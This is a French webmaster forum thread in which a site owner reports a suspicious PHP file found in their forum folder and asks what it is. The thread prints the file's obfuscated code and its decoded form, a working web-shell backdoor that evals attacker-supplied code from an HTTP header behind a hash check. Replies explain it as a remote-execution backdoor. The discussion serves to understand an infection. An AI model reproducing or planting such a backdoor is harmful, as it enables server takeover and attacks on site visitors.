Etrange fichier .php sur mon forum

WRInaute passionné
Salut,

Comme je disais ici, je me tire d'IPB, leur chauvinisme de cowboys poudrés me fatigue. Je vais me reprogrammer mon script à moi. On est jamais mieux servi que par soi-même dit le proverbe, c'est encore plus vrai en informatique.

Ceci dit, en regardant dans le dossier /forum de mon hébergement, j'ai trouvé un fichier au nom étrange. Je ne me rappelle pas l'avoir déjà vu :

Le contenu n'est pas moins étrange :
Code:
<?php $_6e835c3="\x70\x72\x65\x67\x5f\x72\x65\x70\x6c\x61\x63\x65";$_6e835c3("\x7c\x2e\x7c\x65","\x65\x76\x61\x6c\x28\x27\x65\x76\x61\x6c\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x28\x22aWYobWQ1KCRfU0VSVkVSWydIVFRQX1FVT1RFJ10pPT0nZTY2ZTZjYWRkNmUxM2VmZWE1NGVkNTBjMGInIGFuZCBpc3NldCgkX1NFUlZFUlsnSFRUUF9YX0NPREUnXSkpIEBldmFsKEBiYXNlNjRfZGVjb2RlKHN0cnJldihAJF9TRVJWRVJbJ0hUVFBfWF9DT0RFJ10pKSk7\x22\x29\x29\x3b\x27\x29",'.');?>

Qu'est-ce donc que cette chose ?
 
WRInaute passionné
Peux-tu m'en dire plus, cher madri2. Qu'est-ce que ce eval dont tu parles ?

Si mon site a été piraté, pourquoi rien n'a été modifié nulle part ?
 
WRInaute impliqué
un bout de code qui permet d'executer du code à distance, et comme dit d'utiliser ton serveur comme passerelle éventuellement pour hacker d'autres sites ou infecter tes visiteurs
 
WRInaute passionné
Merci spout,


Ca me sort ça :

if(md5($_SERVER['HTTP_QUOTE'])=='e66e6cadd6e13efea54ed50c0eb2d32b' and isset($_SERVER['HTTP_X_CODE'])) @eval(@base64_decode(strrev(@$_SERVER['HTTP_X_CODE'])));

Vous en pensez quoi ?

nickargall a dit:
ça peut être une faille sur ton site, un cheval de troie dans ton FileZilla, ...
Comment trouver la petite bête ? Je voulais me connecter en SSL ou quelque chose comme ça avec Filezilla, mais ça m'a paru compliqué, j'ai zappé l'idée.
 
Discussions similaires
Haut